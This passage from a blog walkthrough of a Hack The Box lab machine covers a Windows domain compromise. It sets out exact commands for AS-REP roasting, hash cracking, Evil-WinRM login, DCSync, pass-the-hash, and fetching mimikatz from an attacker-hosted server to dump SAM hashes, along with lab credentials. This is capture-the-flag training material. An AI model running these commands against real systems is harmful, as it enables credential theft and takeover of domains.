simply explain what the kerberos authentication is. If you need to know what <code>DONT_REQ_PREAUTH</code> flag means, you must understand the<strong> kerberos authentication </strong>before.</p><figure class="kg-card kg-image-card"></figure><p>This draft shows you how the normal authentication process. But if <code>DONT_REQ_PREAUTH</code> flag is set, <strong>second </strong>and <strong>third </strong>steps of the process can be missed. That means you can directly request the service ticket. Click <a href="https://en.wikipedia.org/wiki/Kerberos_(protocol)?ref=192.168.184.131" rel="noopener noreferrer">here</a> if you need more information about kerberos authentication.</p><hr></hr><h2 id="02-foothold"><strong>02. Foothold</strong></h2><p>Now we are going to use <a href="https://github.com/SecureAuthCorp/impacket?ref=192.168.184.131" rel="noopener noreferrer">impacket's</a> <code>GetNPUsers.py</code> script to grab the request service ticket.</p><p>Type below commands to grab the request ticket.</p><pre><code class="language-bash">python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john</code></pre><pre><code>-request   : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass   : Don't ask for password (useful for Kerberos authentication)
-dc-ip     : IP Address of the domain controller.
-format    : Format to save the AS_REQ of users without pre-authentication. Default is hashcat</code></pre><p>Output will be like this. 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-72.png" class="kg-image" width="1348" height="171" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-72.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-72.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-72.png 1348w" layout="responsive"></amp-img></figure><p>We grabbed the ticket. Now it's time to powerup <a href="https://www.openwall.com/john/?ref=192.168.184.131" rel="noopener noreferrer">John the Ripper</a> and crack the hash. First of all copy that hash to file then run the <code>john</code>.🤠🤠</p><pre><code class="language-bash">john hash --wordlist=/usr/share/wordlists/rockyou.txt</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-73.png" class="kg-image" width="1344" height="320" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-73.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-73.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-73.png 1344w" layout="responsive"></amp-img></figure><p>We got the password for <code>svc_bes</code> !!!</p><ul><li><code>svc_bes :<strong> </strong>Sheffield19</code></li></ul><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-74.png" class="kg-image" width="508" height="288" layout="responsive"></amp-img></figure><p>Now since we have the username and password, we can use <a href="https://github.com/Hackplayers/evil-winrm?ref=192.168.184.131" rel="noopener noreferrer">Evil-WinRM</a> tool. You can simply install it by typing <code>gem install evil-winrm</code> and hit enter, then the tool will be installed to your machine. 😎😎</p><p>Now, Don't you have a question ❓ We already have the username and password for user <strong>sandra</strong>. Why didn't we use it? It's because there is nothing inside that account. It's just a simple user account.</p><p>Let's run the tool for <code>svc_bes</code> account.</p><pre><code class="language-bash">evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-75.png" class="kg-image" width="569" height="205" layout="responsive"></amp-img></figure><p>So we got the user flag. Now, time to <strong>escalate privileges</strong>.</p><hr></hr><h2 id="03-privilege-escalation"><strong>03. Privilege Escalation</strong></h2><p>Now we are going to perform <a href="https://www.qomplx.com/kerberos_dcsync_attacks_explained/?ref=192.168.184.131" rel="noopener noreferrer">DCSync attack</a> and dump the NTLM hashes of all domain users using the Impacket's <a href="https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/secretsdump.py?ref=192.168.184.131" rel="noopener noreferrer">secretsdump.py </a>script. 😈😈 Let's try it</p><pre><code class="language-bash"> /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30</code></pre><p>Here is the output. 👇👇</p><figure class="kg-card kg-image-card"></figure><p><br />As you can see, We have NTLM hash for the Administrator account. We can use this to perform <a href="https://en.wikipedia.org/wiki/Pass_the_hash?ref=192.168.184.131"><strong>Pass The Hash attack</strong></a> and gain elevated access to the system. Also we can use Impacket's<a href="https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py?ref=192.168.184.131" rel="noopener noreferrer"> psexec.py</a> for this too.</p><p>See how  <a href="https://github.com/SecureAuthCorp/impacket?ref=192.168.184.131" rel="noopener noreferrer">impacket</a>  helps us during this machine. Give respect to the <a href="https://www.secureauth.com/?ref=192.168.184.131" rel="noopener noreferrer">SecureAuth Corporation</a>. 🙋‍♂️🙋‍♂️</p><h3 id="031-perform-pass-the-hash-attack"><strong>03.1 Perform Pass The Hash Attack</strong></h3><figure class="kg-card kg-image-card"></figure><p>First, copy the above Administrator's hash without triple colon (:::) at the end and then type this.</p><pre><code class="language-bash">/usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes &lt;NTML hash&gt;</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-76.png" class="kg-image" width="1880" height="564" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-76.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-76.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-76.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-76.png 1880w" layout="responsive"></amp-img></figure><p><br />We got the root flag too!!. 🧐🧐</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-77.png" class="kg-image" width="845" height="762" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-77.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-77.png 845w" layout="responsive"></amp-img></figure><hr></hr><h3 id="04-post-exploitation"><strong>04. Post Exploitation</strong></h3><figure class="kg-card kg-image-card"></figure><p>Since these boxes are all connected, we are going to grab the local admin hash too. So let’s upload <a href="https://github.com/gentilkiwi/mimikatz/wiki?ref=192.168.184.131" rel="noopener noreferrer">mimikatz.</a> You can download  <code>mimikatz</code> tool from <a href="https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip?ref=192.168.184.131" rel="noopener noreferrer">here</a> and upload it to the box using python demon web server.</p><pre><code class="language-bash">wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip &amp;&amp; unzip mimikatz_trunk.zip &amp;&amp; cd x64 &amp;&amp; python3 -m http.server</code></pre><pre><code class="language-bash">powershell.exe -c "IWR -useBasicParsing http://&lt;YourIP&gt;:8000/mimikatz.exe -o mcat.exe"</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-78.png" class="kg-image" width="1249" height="917" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-78.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-78.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-78.png 1249w" layout="responsive"></amp-img></figure><p>Then we can run that file by typing <code>.\mcat</code> And then run the <code>lsadump::sam</code> command.</p><figure class="kg-card kg-image-card"></figure><p>Here is the hash : 7facdc498ed1680c4fd1448319a8c04f</p><p>You can decode it through the <a href="https://crackstation.net/?ref=192.168.184.131" rel="noopener noreferrer">crackstation </a>site.</p><figure class="kg-card kg-image-card"></figure><p>The password is : <code>Password!</code></p><p>Finally we are done. and from here you must have <strong>VIP or VIP+</strong>  membership to play with other boxes.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-79.png" class="kg-image" width="389" height="241" layout="responsive"></amp-img></figure><p>Okay... I’ll see you on the next box! <a href="https://h4rithd.com/blog/starting-point-htb-included-walkthrough/index.html?ref=192.168.184.131"><strong>Included</strong></a> 🙋‍♂️🙋‍♂️</p><p><strong>Find me on <a href="https://twitter.com/h4rithd?ref=192.168.184.131" rel="noreferrer">@twitter</a></strong> </p>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed" alt="h4rithd.com"></amp-img>
        <h3>h4rithd.com</h3>
            <p>- Penetration Tester | Ethical Hacker | Security Researcher -</p>
        <p><a href="../../index.html">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
